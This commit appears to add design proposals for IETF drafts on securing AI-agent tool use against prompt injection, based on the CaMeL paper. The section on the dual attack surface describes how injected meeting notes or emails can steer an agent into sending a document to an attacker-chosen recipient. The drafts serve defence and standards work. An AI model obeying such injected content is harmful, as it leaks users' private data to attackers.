feat: proposal intake pipeline with AI-powered generation on /proposals/new
Add the full proposal system: DB schema (proposals + proposal_gaps tables),
a CLI `ietf intake` command, and a web UI with Quick Generate on
/proposals/new. The new page merges AI intake (paste a URL or text → Haiku
generates multiple proposals auto-linked to gaps) with manual form entry.
Generated proposals are clickable cards that fill the editor below for
refinement. Uses claude_model_cheap (Haiku) for cost-efficient web intake.
Includes CaMeL-inspired draft proposals from analysis of arXiv:2503.18813.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

data/reports/draft-proposals/camel-inspired/00-index.md
@@ -0,0 +1,79 @@

---
title: "CaMeL-Inspired IETF Draft Proposals"
source_paper: "Defeating Prompt Injections by Design (arXiv:2503.18813)"
source_authors: "Debenedetti, Shumailov, Fan, Hayes, Carlini, Fabian, Kern, Shi, Terzis, Tramèr"
date: 2026-03-09
status: proposal
---

# CaMeL-Inspired IETF Draft Proposals

Six IETF Internet-Draft proposals derived from [Defeating Prompt Injections by Design](https://arxiv.org/abs/2503.18813) (Google DeepMind / ETH Zurich, 2025), cross-referenced against the 12 gaps identified in the IETF AI agent standards landscape.

## Source Paper: CaMeL (CApabilities for MachinE Learning)

CaMeL proposes a **capability-based security layer** around LLM agents that defeats prompt injection attacks by design, not through model training. Key concepts:

- **Privileged/Quarantined LLM separation**: planning (trusted) vs. data processing (untrusted)
- **Capability tags**: every data value carries provenance (source) and access control (allowed readers)
- **Security policies**: Python-expressible per-tool policies checked before execution
- **Data flow graph**: tracks dependencies between all variables across tool calls
- **Control flow integrity**: prevents untrusted data from influencing execution plans
- Evaluated on AgentDojo: 77% task success with **provable** security (vs. 84% undefended)

## Draft Overview

| # | Draft Name | Status | Primary Gaps | CaMeL Section |
|---|-----------|--------|-------------|---------------|
| 1 | [Capability-Based Security Policies](01-capability-security-policies.md) | outline | #86, #89, #93 | §5.2, §5.3 |
| 2 | [Control/Data Flow Integrity](02-control-data-flow-integrity.md) | outline | #85, #88, #89 | §2, §5.4, §6.4 |
| 3 | [Data Provenance Tracking Protocol](03-data-provenance-tracking.md) | outline | #84, #88, #93 | §5.3, §5.4 |
| 4 | [Security Policy Federation](04-security-policy-federation.md) | outline | #83, #87, #90 | §5.2, §9.1 |
| 5 | [Privileged/Quarantined Execution Model](05-privileged-quarantined-execution.md) | outline | #89, #92, #94 | §5.1 |
| 6 | [Side-Channel Mitigation Framework](06-side-channel-mitigation.md) | outline | #89, #93 | §7 |

## Dependency Graph

```
Draft 5 (Execution Model)
  └─► Draft 1 (Capabilities) ◄── foundational
        ├─► Draft 2 (Flow Integrity)
        ├─► Draft 3 (Provenance)
        └─► Draft 4 (Policy Federation)
              └─► Draft 6 (Side Channels) ◄── BCP document
```

**Reading order**: 5 → 1 → 2/3 (parallel) → 4 → 6

## Gap Coverage Matrix

| Gap | Topic | Drafts |
|-----|-------|--------|
| #83 | Cross-org AI agent liability | 4 |
| #84 | Real-time explainability | 3 |
| #85 | Emergency shutdown coordination | 2 |
| #86 | Resource consumption governance | 1 |
| #87 | Cross-domain identity federation | 4 |
| #88 | Decision audit trail interop | 2, 3 |
| #89 | Adversarial agent detection | 1, 2, 5, 6 |
| #90 | Capability negotiation protocols | 4 |
| #91 | Decentralized model version control | — |
| #92 | Ethical decision conflict resolution | 5 (partial) |
| #93 | Privacy-preserving A2A communication | 1, 3, 6 |
| #94 | Behavioral specification languages | 5 |

## Relationship to Existing Work

These drafts **build on** (not compete with) existing IETF work:

- **WIMSE** (Workload Identity in Multi System Environments): identity + security context propagation → our capabilities extend this with data-level provenance
- **ECT** (Execution Context Tokens): DAG-linked audit records → our provenance tracking is complementary
- **MCP** (Model Context Protocol): tool interface standard → our security policies wrap around MCP tool calls
- **A2A** (Agent-to-Agent): agent communication → our flow integrity applies to A2A message exchanges
- **GNAP/OAuth**: authorization → our policy federation extends authz to data-flow-aware decisions

## Iteration Tracking

| Date | Change | Author |
|------|--------|--------|
| 2026-03-09 | Initial outlines for all 6 drafts | — |
@@ -0,0 +1,216 @@

---
title: "Capability-Based Security Policies for AI Agent Tool Use"
draft_name: draft-nennemann-ai-agent-capability-policies-00
intended_wg: SECDISPATCH → new WG or WIMSE
status: outline
gaps_addressed: [86, 89, 93]
camel_sections: [5.2, 5.3]
date: 2026-03-09
---

# Capability-Based Security Policies for AI Agent Tool Use

## 1. Problem Statement

AI agents interact with external tools (APIs, filesystems, messaging services) on behalf of users. Current agent frameworks allow any tool to receive any data, with no mechanism to restrict what an agent can do with a particular piece of information. This leads to:

- **Data exfiltration**: an agent tricked into sending private data to unauthorized recipients
- **Resource abuse**: agents consuming unbounded computational, network, or API resources
- **Privacy violations**: sensitive data flowing to tools that should never see it

CaMeL (Debenedetti et al., 2025) demonstrates that associating **capabilities** (provenance + access control metadata) with every data value, and checking **security policies** before each tool invocation, can provide provable security guarantees against prompt injection attacks — without modifying the underlying LLM.

No IETF standard currently defines how capabilities should be represented, propagated, or enforced in AI agent systems.

## 2. Scope

This document defines:

1. A **capability metadata schema** for tagging data values with provenance and access control
2. A **security policy expression format** for defining per-tool invocation constraints
3. A **policy enforcement protocol** for checking capabilities against policies before tool execution
4. Integration points with existing authorization frameworks (OAuth 2.0, GNAP, WIMSE)

Out of scope:

- The internal architecture of the agent (Dual-LLM vs. single LLM)
- Specific tool implementations
- Model training or fine-tuning requirements

## 3. Key Concepts from CaMeL

### 3.1 Capabilities

From CaMeL §5.3: capabilities are tags assigned to each value describing:

- **Sources**: where the data came from (user input, a specific tool, an LLM transformation)
- **Readers**: who is allowed to access the data (public, specific users/email addresses, specific tools)

CaMeL's implementation tracks:

- `User` provenance (literals from the trusted user query)
- `CaMeL` provenance (results of interpreter transformations)
- Tool-specific provenance (identified by a unique tool invocation ID)
- Inner sources (e.g., the sender of an email retrieved by `read_email`)

### 3.2 Security Policies

From CaMeL §5.2: security policies are functions that take a tool name and its arguments (with capability metadata) and return `Allowed` or `Denied`. Example (adapted from CaMeL Figure 6):

```python
# Calendar event: the title/description must be readable by all participants,
# OR all participants must come from the user (a trusted source).
def check_create_event(tool_name, kwargs):
    participants = kwargs["participants"]
    if is_trusted(participants):
        return Allowed()
    if not can_readers_read_value(participants, kwargs["title"]):
        return Denied("Title is not readable by participants")
    return Allowed()
```

Policies can be:

- **Global**: apply to all tools (e.g., "never send PII to external services")
- **Per-tool**: specific to one tool (e.g., `send_email` requires the recipient to be able to read the body)
- **Contextual**: depend on runtime state

## 4. Proposed Wire Format

### 4.1 Capability Metadata Object

```json
{
  "cap:version": "1.0",
  "cap:value_id": "val-2f8a3c",
  "cap:sources": [
    {
      "type": "user",
      "trust_level": "trusted"
    },
    {
      "type": "tool",
      "tool_id": "read_email",
      "invocation_id": "inv-9d2e1f",
      "inner_source": "sender:bob@example.com"
    }
  ],
  "cap:readers": {
    "type": "set",
    "members": ["user", "bob@example.com"]
  },
  "cap:transformations": [
    {
      "type": "llm_extraction",
      "model_role": "quarantined",
      "input_values": ["val-1a2b3c"],
      "timestamp": "2026-03-09T14:30:00Z"
    }
  ]
}
```

### 4.2 Security Policy Definition

```json
{
  "policy:version": "1.0",
  "policy:id": "pol-send-email",
  "policy:tool": "send_email",
  "policy:rules": [
    {
      "description": "Recipient must come from user or be readable by all other param sources",
      "check": "sources_trusted_or_readers_match",
      "params": ["recipient"],
      "against": ["body", "subject", "attachments"]
    },
    {
      "description": "Attachments must be readable by recipient",
      "check": "readers_include",
      "params": ["attachments"],
      "must_include": "{{recipient}}"
    }
  ],
  "policy:on_violation": "deny_with_user_prompt"
}
```

### 4.3 Policy Evaluation Result

```json
{
  "result": "denied",
  "policy_id": "pol-send-email",
  "rule_index": 1,
  "reason": "Attachment 'confidential.txt' sources=[tool:cloud_storage] readers=[user, file_editors] — recipient 'attacker@evil.com' not in readers",
  "remediation": "user_approval_required"
}
```
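
To make the evaluation semantics concrete, here is a minimal, non-normative sketch of how an enforcement engine might evaluate the `readers_include` rule from §4.2 against capability metadata shaped as in §4.1. The helper shapes (an `args` mapping from parameter name to a `(value, capability)` pair) are illustrative, not part of the proposed format:

```python
def readers_include(cap: dict, reader: str) -> bool:
    """True if the capability's reader set allows `reader`."""
    readers = cap.get("cap:readers", {})
    if readers.get("type") == "public":  # a public reader set allows everyone
        return True
    return reader in readers.get("members", [])

def evaluate_readers_rule(rule: dict, args: dict) -> dict:
    """Evaluate one §4.2 rule; args maps param name -> (value, capability)."""
    reader_value, _ = args[rule["must_include"].strip("{}")]  # resolve "{{recipient}}"
    for param in rule["params"]:
        _, cap = args[param]
        if not readers_include(cap, reader_value):
            return {"result": "denied",
                    "reason": f"'{param}' is not readable by '{reader_value}'"}
    return {"result": "allowed"}
```

Applied to the example above, an attachment whose readers are `["user", "file_editors"]` and a recipient of `attacker@evil.com` yields the denial shown in §4.3.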

## 5. Protocol Flow

```
User Query
     │
     ▼
┌───────────────┐
│ Agent Planner │  (Privileged — sees only user query)
│ generates plan│
└──────┬────────┘
       │  plan = [(tool₁, args₁), (tool₂, args₂), ...]
       ▼
┌───────────────────┐
│ Capability Engine │  (Interpreter / orchestrator)
│                   │
│ For each step:    │
│ 1. Execute tool   │
│ 2. Tag result     │──► Capability metadata attached
│    with caps      │
│ 3. Check policy   │──► Policy evaluation
│    before next    │      ├─► Allowed → proceed
│    tool call      │      ├─► Denied → halt + explain
│ 4. Propagate      │      └─► User prompt → ask user
│    caps through   │
│    transforms     │
└───────────────────┘
```
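
A non-normative sketch of the Capability Engine loop above; `check_policies`, `execute`, `tag_result`, and `require_user_approval` are assumed implementation hooks, and the result shape is illustrative:

```python
class PolicyViolation(Exception):
    pass

def run_plan(plan, policies):
    """Execute a plan step by step, checking policies before each tool call."""
    values = {}  # value_id -> (value, capability metadata)
    for tool, args in plan:
        decision = check_policies(policies, tool, args, values)
        if decision["result"] == "denied":
            raise PolicyViolation(decision["reason"])    # halt + explain
        if decision["result"] == "user_prompt":
            require_user_approval(tool, args, decision)  # ask the user
        result = execute(tool, args)
        # Steps 2 and 4: tag the result, propagating capabilities from inputs.
        values[result["value_id"]] = (result["value"],
                                      tag_result(result, args, values))
    return values
```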

## 6. Integration Points

### 6.1 With WIMSE / ECT

- Capability `sources` map to WIMSE workload identities
- Policy evaluation results can be recorded as ECT claims
- Trust domain boundaries in WIMSE correspond to capability reader boundaries

### 6.2 With MCP (Model Context Protocol)

- MCP tool definitions extended with a `required_capabilities` field
- MCP tool results extended with a `capability_metadata` field
- MCP servers can declare their security policies

### 6.3 With OAuth 2.0 / GNAP

- OAuth scopes are coarse-grained (per-API); capabilities are fine-grained (per-value)
- Capability `readers` can reference OAuth client IDs or GNAP access tokens
- Policy enforcement complements (not replaces) OAuth authorization

## 7. Security Considerations

- Capability metadata must be integrity-protected (signed) to prevent tampering
- Policy definitions must come from a trusted source (the platform, not the agent)
- Capability propagation through LLM transformations is inherently lossy — conservative defaults are required
- Policy denial patterns are themselves a side-channel leakage vector (see Draft 6)

## 8. Open Questions

1. **Granularity**: per-value capabilities (CaMeL) vs. per-message capabilities — what is the performance tradeoff?
2. **Composability**: how do capabilities compose when data from multiple sources is merged?
3. **Delegation**: can an agent delegate capabilities to sub-agents?
4. **Revocation**: how are capabilities revoked when trust relationships change?
5. **Policy conflict resolution**: when multiple policies apply, which wins?

## 9. References

- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
- Needham & Walker. "The Cambridge CAP computer and its protection system." ACM SIGOPS, 1977.
- Watson et al. "Capsicum: Practical Capabilities for UNIX." USENIX Security, 2010.
- Watson et al. "CHERI: A hybrid capability-system architecture." IEEE S&P, 2015.
- Morgan. "libcap: POSIX capabilities support for Linux." 2013.
- draft-ietf-wimse-arch (WIMSE architecture)
- draft-nennemann-wimse-ect (Execution Context Tokens)
@@ -0,0 +1,258 @@

---
title: "Control Flow and Data Flow Integrity for Multi-Agent Systems"
draft_name: draft-nennemann-ai-agent-flow-integrity-00
intended_wg: SECDISPATCH → new WG
status: outline
gaps_addressed: [85, 88, 89]
camel_sections: [2, 5.4, 6.4, 7]
date: 2026-03-09
---

# Control Flow and Data Flow Integrity for Multi-Agent Systems

## 1. Problem Statement

AI agent systems have two distinct attack surfaces that are often conflated:

1. **Control flow attacks**: an adversary changes *which* tools the agent calls or *in what order*
2. **Data flow attacks**: an adversary changes *what data* is passed to tools, without altering the sequence of tool calls

CaMeL (Debenedetti et al., 2025) demonstrates that protecting only control flow (as the Dual-LLM pattern does) is insufficient. Even when an adversary cannot change the plan, they can manipulate the *data flowing through the plan* — analogous to SQL injection, where the query structure is unchanged but the parameters are manipulated.

In multi-agent systems this problem is amplified: data flows across organizational boundaries and through multiple agent hops, and the distinction between control flow and data flow can blur entirely (CaMeL §6.4: "when data flow becomes control flow").

No IETF standard addresses control flow integrity or data flow integrity for AI agent systems.

## 2. Scope

This document defines:

1. A **Control Flow Graph (CFG)** representation for agent execution plans
2. A **Data Flow Graph (DFG)** representation for tracking data dependencies
3. **Integrity verification** mechanisms for both graphs
4. An **emergency halt protocol** for when integrity violations are detected
5. An **interoperable audit format** for recording flow integrity events

## 3. Key Insights from CaMeL

### 3.1 The Dual Attack Surface

CaMeL §2 shows that agent actions have both a control flow and a data flow. Consider:

```
1. Find meeting notes         (control: tool selection)
2. Extract email + doc name   (data: from untrusted content)
3. Fetch document by name     (data: attacker-chosen filename)
4. Send document to email     (data: attacker-chosen recipient)
```

A prompt injection in the meeting notes can change the *data* in steps 2–4 without changing the *plan*. The control flow is correct; the data flow is hijacked.

### 3.2 Data Flow Becomes Control Flow (§6.4)

CaMeL identifies a critical escalation: when an agent is instructed to "monitor emails and execute the action described in each email", the email content *becomes* the control flow. An attacker can send emails that dictate arbitrary tool sequences. This is analogous to **Return-Oriented Programming (ROP)** in traditional security.

### 3.3 Dependency Graph Tracking (§5.4)

CaMeL's interpreter maintains a complete dependency graph:

- For `c = a + b`, variable `c` depends on both `a` and `b`
- For control flow (`if`/`for`) in STRICT mode, all statements in the block depend on the condition
- This enables security policy checks such as "does this tool argument transitively depend on untrusted data?" (see the sketch below)
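
A minimal sketch of this bookkeeping (illustrative, not CaMeL's actual interpreter):

```python
class Value:
    """A value plus its transitive dependency set and a taint flag."""
    def __init__(self, val, deps=frozenset(), trusted=True):
        self.val, self.deps, self.trusted = val, frozenset(deps), trusted

def derive(op, *inputs):
    """c = op(a, b, ...): c depends on every input and all of their deps."""
    deps = frozenset().union(*(i.deps | {id(i)} for i in inputs))
    trusted = all(i.trusted for i in inputs)  # any untrusted input taints c
    return Value(op(*(i.val for i in inputs)), deps, trusted)

a = Value(2)                          # trusted literal
b = Value(3, trusted=False)           # from untrusted tool output
c = derive(lambda x, y: x + y, a, b)
assert c.val == 5 and not c.trusted   # c transitively depends on b
```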

## 4. Control Flow Graph Specification

### 4.1 CFG Representation

```json
{
  "cfg:version": "1.0",
  "cfg:plan_id": "plan-4a7b2c",
  "cfg:origin": "privileged_planner",
  "cfg:steps": [
    {
      "step_id": "s1",
      "tool": "search_notes",
      "args_template": {"query": "meeting notes"},
      "successors": ["s2"],
      "trust_level": "privileged"
    },
    {
      "step_id": "s2",
      "tool": "extract_fields",
      "args_template": {"fields": ["email", "doc_name"]},
      "data_deps": ["s1.result"],
      "successors": ["s3", "s4"],
      "trust_level": "quarantined"
    }
  ],
  "cfg:integrity": {
    "algorithm": "sha256",
    "signature": "...",
    "signer": "privileged_planner_id"
  }
}
```

### 4.2 CFG Integrity Properties

1. **Immutability**: once the plan is generated by a privileged planner, the step sequence cannot be altered by data processing
2. **Signed origin**: the CFG must be signed by the trusted planner component
3. **No dynamic expansion**: untrusted data cannot add new steps to the plan (prevents ROP-style attacks)

## 5. Data Flow Graph Specification

### 5.1 DFG Representation

```json
{
  "dfg:version": "1.0",
  "dfg:plan_id": "plan-4a7b2c",
  "dfg:nodes": [
    {
      "node_id": "val-email",
      "produced_by": "s2",
      "depends_on": ["s1.result"],
      "trust_classification": "untrusted",
      "capability_ref": "cap-2f8a3c"
    },
    {
      "node_id": "val-doc",
      "produced_by": "s3",
      "depends_on": ["val-doc_name"],
      "trust_classification": "untrusted",
      "capability_ref": "cap-7e9d1f"
    }
  ],
  "dfg:edges": [
    {"from": "s1.result", "to": "val-email", "type": "extraction"},
    {"from": "val-email", "to": "s4.args.recipient", "type": "argument_binding"}
  ]
}
```

### 5.2 DFG Integrity Properties

1. **Provenance tracking**: every value in the DFG carries its full dependency chain
2. **Trust boundary marking**: values crossing from trusted to untrusted contexts are explicitly labeled
3. **Taint propagation**: if any dependency is untrusted, the derived value is untrusted (conservative)
4. **STRICT mode**: control flow conditions add dependencies to all values in their scope

## 6. Integrity Verification

### 6.1 Pre-Execution Checks

Before each tool invocation, the enforcement engine verifies (check 1 is sketched after this list):

1. The tool invocation matches the signed CFG (control flow integrity)
2. All arguments' data flow paths are within policy bounds (data flow integrity)
3. No untrusted data has been promoted to trusted without explicit user approval
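
A sketch of check 1, assuming a detached signature over the canonicalized plan; the `verify_sig` callback is an assumed implementation hook:

```python
import hashlib
import json

def cfg_digest(cfg: dict) -> str:
    """Canonical SHA-256 digest of the plan, excluding the signature block."""
    body = {k: v for k, v in cfg.items() if k != "cfg:integrity"}
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()

def verify_step(cfg: dict, step_id: str, tool: str, verify_sig) -> bool:
    """Control flow integrity: the pending call must match the signed plan."""
    integrity = cfg["cfg:integrity"]
    if not verify_sig(cfg_digest(cfg), integrity["signature"], integrity["signer"]):
        return False                     # plan was altered after signing
    step = next((s for s in cfg["cfg:steps"] if s["step_id"] == step_id), None)
    return step is not None and step["tool"] == tool  # no tool swap, no new steps
```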

### 6.2 Cross-Agent Flow Integrity

When agents communicate (e.g., via the A2A protocol):

```
Agent A (Org 1)                      Agent B (Org 2)
┌──────────────┐                     ┌──────────────┐
│ Plan: s1→s2  │ ──── message ─────► │ Plan: s3→s4  │
│ DFG attached │     with DFG        │ DFG merged   │
└──────────────┘     metadata        └──────────────┘
```

- Outbound messages carry DFG provenance metadata
- Receiving agents extend (not replace) the DFG with new dependencies
- Trust boundaries are preserved across agent hops

## 7. Emergency Halt Protocol

*Directly addresses Gap #85: Emergency shutdown coordination across agent networks.*

When a flow integrity violation is detected:

### 7.1 Violation Severity Levels

| Level | Condition | Action |
|-------|-----------|--------|
| `warning` | Untrusted data flowing to a low-risk tool | Log + continue |
| `halt` | Untrusted data flowing to a state-changing tool | Block tool call + prompt user |
| `emergency` | Data-flow-becomes-control-flow detected | Halt all agents in the plan + notify operators |
| `cascade_stop` | Integrity violation in a multi-agent pipeline | Propagate halt signal to all connected agents |

### 7.2 Cascade Halt Message

```json
{
  "halt:version": "1.0",
  "halt:plan_id": "plan-4a7b2c",
  "halt:severity": "cascade_stop",
  "halt:trigger": {
    "step_id": "s4",
    "violation": "untrusted_data_as_control_flow",
    "evidence": {
      "tainted_value": "val-email-body",
      "became_control": "tool_selection"
    }
  },
  "halt:affected_agents": ["agent-a@org1", "agent-b@org2"],
  "halt:timestamp": "2026-03-09T14:35:22Z",
  "halt:preserve_state": true
}
```

### 7.3 Recovery

After an emergency halt:

1. All affected agents freeze execution state (no rollback by default)
2. Human operators receive the full CFG + DFG with the violation highlighted
3. Operators can approve (override), modify the plan, or terminate
4. State is preserved for forensic analysis

## 8. Audit Format for Flow Events

*Addresses Gap #88: Decision audit trail interoperability.*

Every flow integrity event is logged in a standardized format:

```json
{
  "audit:event_type": "policy_check",
  "audit:plan_id": "plan-4a7b2c",
  "audit:step_id": "s4",
  "audit:tool": "send_email",
  "audit:cfg_valid": true,
  "audit:dfg_check": {
    "args_checked": ["recipient", "body", "subject"],
    "tainted_args": ["recipient"],
    "taint_chain": ["s1.result → s2.extract → val-email"],
    "policy_result": "denied"
  },
  "audit:timestamp": "2026-03-09T14:35:22Z",
  "audit:agent_id": "agent-a@org1"
}
```

This format is compatible with ECT (Execution Context Tokens) for DAG-linked audit chains.

## 9. Security Considerations

- CFG signatures must use strong cryptography (digital signatures, not bare hashes)
- DFG tracking has overhead proportional to plan complexity — bounded by the maximum plan depth
- STRICT mode (all statements in control flow blocks inherit the condition's dependencies) is more secure but reduces utility
- ROP-style attacks (composing allowed operations into malicious sequences) remain a risk even with flow integrity

## 10. Open Questions

1. **Dynamic plans**: some agents need to adapt plans based on intermediate results. How can CFG integrity be maintained while allowing legitimate plan modification?
2. **DFG size**: for long-running agents, the DFG can grow large. What pruning strategies are acceptable?
3. **Cross-protocol**: how does flow integrity metadata translate between MCP, A2A, and other protocols?
4. **Performance**: what is the real-time DFG tracking overhead in latency-sensitive applications?

## 11. References

- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
- Abadi et al. "Control-flow integrity principles, implementations, and applications." ACM TISSEC, 2009.
- Denning & Denning. "Certification of programs for secure information flow." CACM, 1977.
- Willison. "The Dual LLM pattern for building AI assistants." 2023.
- Shacham. "The geometry of innocent flesh on the bone: return-into-libc without function calls." ACM CCS, 2007.
@@ -0,0 +1,268 @@

---
title: "Data Provenance Tracking Protocol for AI Agent Communications"
draft_name: draft-nennemann-ai-agent-provenance-00
intended_wg: SECDISPATCH or WIMSE
status: outline
gaps_addressed: [84, 88, 93]
camel_sections: [5.3, 5.4]
date: 2026-03-09
---

# Data Provenance Tracking Protocol for AI Agent Communications

## 1. Problem Statement

When AI agents process data through multi-step tool-calling pipelines, the **origin and transformation history** of each piece of data is lost. This creates three critical problems:

1. **No explainability** (Gap #84): when an agent makes a decision, there is no standard way to trace *which data influenced it* and *where that data came from* in real time
2. **Incompatible audit trails** (Gap #88): different agent platforms log decisions in incompatible formats, making cross-system forensics impossible
3. **Privacy leakage** (Gap #93): without provenance tracking, agents cannot enforce data handling policies — private training data, user interactions, and proprietary algorithms may leak through tool calls

CaMeL demonstrates that tracking provenance at the **individual value level** (not just the message level) is both feasible and essential for security. Every variable in CaMeL's interpreter carries metadata about its sources and allowed readers.

## 2. Scope

This document defines:

1. A **provenance record format** for tracking data origin and transformation chains
2. A **provenance propagation protocol** for maintaining provenance across agent boundaries
3. A **provenance query interface** for real-time explainability
4. **Privacy constraints** on the provenance metadata itself

## 3. Provenance Model

### 3.1 Provenance Record

Every data value in an agent system carries a provenance record:

```json
{
  "prov:id": "prov-8c3a2d",
  "prov:value_ref": "val-email-body",
  "prov:origin": {
    "type": "tool_output",
    "tool": "read_email",
    "invocation_id": "inv-4f2a1b",
    "agent_id": "agent-a@org1.example",
    "timestamp": "2026-03-09T14:30:00Z",
    "inner_sources": [
      {
        "type": "external_entity",
        "identifier": "sender:bob@example.com",
        "trust_level": "untrusted"
      }
    ]
  },
  "prov:transformations": [
    {
      "type": "llm_extraction",
      "model_role": "quarantined",
      "operation": "extract_email_address",
      "input_provenance": ["prov-7b2a1c"],
      "timestamp": "2026-03-09T14:30:01Z"
    }
  ],
  "prov:classification": {
    "trust_level": "untrusted",
    "sensitivity": "pii",
    "readers": ["user", "bob@example.com"]
  }
}
```

### 3.2 Origin Types

| Origin Type | Description | Trust Default |
|-------------|-------------|---------------|
| `user_input` | Directly from the authenticated user's query | trusted |
| `tool_output` | Returned by a tool invocation | depends on tool |
| `llm_generation` | Generated by an LLM (P-LLM or Q-LLM) | depends on role |
| `literal` | Hardcoded in the execution plan | trusted |
| `external_entity` | Inner source within tool data (e.g., an email sender) | untrusted |
| `derived` | Computed from other values | min(input trust levels) |

### 3.3 Transformation Types

| Transform Type | Description | Provenance Effect |
|---------------|-------------|-------------------|
| `llm_extraction` | Q-LLM parses unstructured → structured | inherits all input provenance |
| `computation` | Deterministic operation (concat, filter) | union of input provenance |
| `aggregation` | Multiple values combined | union of all input provenance |
| `user_approval` | User explicitly approved a value | upgrades trust to "user_approved" |
| `redaction` | Sensitive content removed | may upgrade trust classification |

## 4. Propagation Protocol

### 4.1 Intra-Agent Propagation

Within a single agent, the execution engine (interpreter) maintains provenance automatically:

```
val_a = tool_1()              → prov: {origin: tool_1}
val_b = tool_2()              → prov: {origin: tool_2}
val_c = extract(val_a)        → prov: {origin: tool_1, transform: extraction}
val_d = combine(val_b, val_c) → prov: {origin: [tool_1, tool_2], transform: computation}
```

**Rule**: derived values inherit the **union** of all input provenances and the **minimum** trust level.
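
A sketch of that rule, with an illustrative three-level trust ordering and a record shape simplified from §3.1:

```python
TRUST_ORDER = {"untrusted": 0, "user_approved": 1, "trusted": 2}

def propagate(*inputs):
    """Derived value: union of input origins, minimum input trust level."""
    origins = [o for p in inputs for o in p["origins"]]
    trust = min((p["trust"] for p in inputs), key=TRUST_ORDER.__getitem__)
    return {"origins": origins, "trust": trust}

val_b = {"origins": [{"type": "tool_output", "tool": "tool_2"}], "trust": "trusted"}
val_c = {"origins": [{"type": "tool_output", "tool": "tool_1"}], "trust": "untrusted"}
val_d = propagate(val_b, val_c)
assert val_d["trust"] == "untrusted" and len(val_d["origins"]) == 2
```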

### 4.2 Inter-Agent Propagation

When data crosses agent boundaries (via A2A, HTTP, or message queues):

```
Agent A                                   Agent B
┌──────────────┐                          ┌───────────────┐
│ val_d        │                          │ val_e         │
│ prov: {      │ ──── message ──────────► │ prov: {       │
│   A's        │     with provenance      │   A's chain + │
│   chain      │     header/metadata      │   hop record  │
│ }            │                          │ }             │
└──────────────┘                          └───────────────┘
```

Provenance headers in inter-agent messages:

```http
POST /agent-b/task HTTP/1.1
Content-Type: application/json
X-Agent-Provenance: eyJwcm92OmlkIjoicHJvdi04YzNhMmQi... (base64-encoded provenance chain)
X-Agent-Provenance-Signature: <signed by agent A>
```
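
A sketch of producing those headers; the header names are the ones proposed above, and the `sign` callback (returning an encoded signature string) is an assumed implementation hook:

```python
import base64
import json

def provenance_headers(chain: list, sign) -> dict:
    """Serialize a provenance chain into the proposed HTTP request headers."""
    payload = json.dumps(chain, sort_keys=True).encode()
    return {
        "X-Agent-Provenance": base64.b64encode(payload).decode(),
        "X-Agent-Provenance-Signature": sign(payload),  # attests the sender
    }
```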

Or as a structured field in A2A messages:

```json
{
  "a2a:message": { ... },
  "a2a:provenance": {
    "chain": [ ... ],
    "hop": {
      "agent_id": "agent-a@org1.example",
      "timestamp": "2026-03-09T14:30:02Z",
      "attestation": "<signature>"
    }
  }
}
```

### 4.3 Provenance Compaction

For long chains, provenance can be compacted (strategy 1 is sketched after this list):

1. **Hash chaining**: replace the full chain with a Merkle tree root plus the most recent N entries
2. **Trust boundary summarization**: when crossing org boundaries, summarize internal provenance as a single attested record
3. **TTL-based pruning**: provenance entries older than a configurable TTL are archived (the reference is retained; detail is available on request)
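
A minimal sketch of strategy 1, with a simple rolling hash chain standing in for the Merkle tree (the output field names are illustrative):

```python
import hashlib
import json

def compact(chain: list, keep: int = 3) -> dict:
    """Fold all but the most recent `keep` entries into one rolling digest."""
    digest = b""
    for entry in chain[:-keep]:
        blob = json.dumps(entry, sort_keys=True).encode()
        digest = hashlib.sha256(digest + blob).digest()  # chain the hashes
    return {
        "prov:compacted_root": digest.hex(),  # "" if nothing was folded
        "prov:recent": chain[-keep:],
    }
```

A verifier holding the archived entries can recompute the root; entries inside the digest can no longer be inspected directly, which is exactly the size/privacy tradeoff compaction makes.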

## 5. Real-Time Provenance Query

*Directly addresses Gap #84: Real-time explainability protocols.*

### 5.1 Query Interface

Any participant (user, operator, or peer agent) can query provenance:

```json
{
  "query:type": "explain_value",
  "query:value_ref": "val-d",
  "query:depth": "full",
  "query:format": "graph"
}
```

Response:

```json
{
  "explain:value_ref": "val-d",
  "explain:summary": "Email address extracted from meeting notes retrieved from cloud storage, combined with user-specified recipient name",
  "explain:graph": {
    "nodes": [
      {"id": "user_input", "trust": "trusted", "content_hint": "user query"},
      {"id": "tool_1:search_notes", "trust": "tool", "content_hint": "meeting notes"},
      {"id": "q_llm:extract", "trust": "untrusted", "content_hint": "extracted email"}
    ],
    "edges": [
      {"from": "tool_1:search_notes", "to": "q_llm:extract"},
      {"from": "q_llm:extract", "to": "val-d"}
    ]
  },
  "explain:trust_assessment": "UNTRUSTED — depends on quarantined LLM extraction from tool output",
  "explain:timestamp": "2026-03-09T14:30:05Z"
}
```

### 5.2 Streaming Provenance

For long-running agent tasks, provenance can be streamed:

- Over an SSE (Server-Sent Events) or WebSocket connection
- Each tool invocation emits a provenance event
- Operators see the dependency graph build in real time

## 6. Privacy-Preserving Provenance

*Addresses Gap #93: Privacy-preserving agent-to-agent communication.*

### 6.1 The Provenance Privacy Paradox

Provenance metadata can itself leak sensitive information:

- Knowing *which tools were called* reveals the user's intent
- Knowing the *inner sources* (e.g., email senders) reveals the user's contacts
- The transformation chain reveals the agent's reasoning process

### 6.2 Privacy Controls

1. **Selective disclosure**: agents can share provenance summaries (trust level, origin type) without full chains
2. **Zero-knowledge trust**: "this value is trusted" is attested by a trusted third party without revealing the full provenance
3. **Provenance redaction**: when crossing privacy boundaries, inner sources are replaced with attestations
4. **Need-to-know**: provenance detail levels depend on the requester's authorization

```json
{
  "prov:origin": {
    "type": "attested",
    "attestor": "org1.example",
    "trust_level": "trusted",
    "detail": "redacted — contact org1.example for full provenance"
  }
}
```

## 7. Relationship to ECT

Execution Context Tokens (draft-nennemann-wimse-ect) record *what happened* in a DAG of signed tokens. Provenance tracking records *where data came from*. They are complementary:

| Aspect | ECT | This Draft |
|--------|-----|-----------|
| **Tracks** | Task execution events | Data origin and flow |
| **Granularity** | Per-task | Per-value |
| **Format** | JWT with DAG links | JSON provenance records |
| **Purpose** | Audit "what was done" | Explain "why this data" |

Integration: ECT claims can reference provenance records, and provenance records can link to ECT task IDs.

## 8. Security Considerations

- Provenance records must be integrity-protected (signed by the producing agent)
- Provenance forgery (claiming a higher trust level) must be detectable via attestation chains
- Provenance metadata size can be significant — compaction mechanisms are essential
- Timing information in provenance can leak operational patterns

## 9. Open Questions

